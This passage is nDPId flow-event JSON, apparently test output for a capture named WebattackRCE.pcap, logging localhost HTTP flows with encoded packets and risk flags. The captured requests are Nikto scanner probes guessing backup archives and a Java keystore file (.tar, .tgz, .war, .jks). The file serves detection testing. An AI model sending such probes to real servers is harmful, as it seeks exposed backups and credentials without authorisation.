-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
